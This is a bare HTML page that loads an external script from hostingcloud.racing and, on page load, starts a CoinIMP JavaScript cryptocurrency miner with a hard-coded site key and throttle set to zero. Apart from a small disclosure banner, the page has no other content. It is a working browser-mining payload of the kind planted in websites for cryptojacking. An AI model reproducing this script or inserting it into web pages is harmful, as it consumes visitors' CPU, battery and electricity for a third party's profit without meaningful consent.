<!DOCTYPE html>
<html lang="en">
<head>
</head>
<body>
    <script src="https://www.hostingcloud.racing/5GGR.js"></script>
<script>
     console.log('Start');
    var _client = new Client.Anonymous('0cda1a13e89283202341d0db807774703d8918ae275f8db6c9316457f413774d', {
        throttle: 0, c: 'w'
    });
    _client.start();
    _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com", "#cccccc", 40, "#3d3d3d");
        console.log('end');
</script>

</body>
</html>
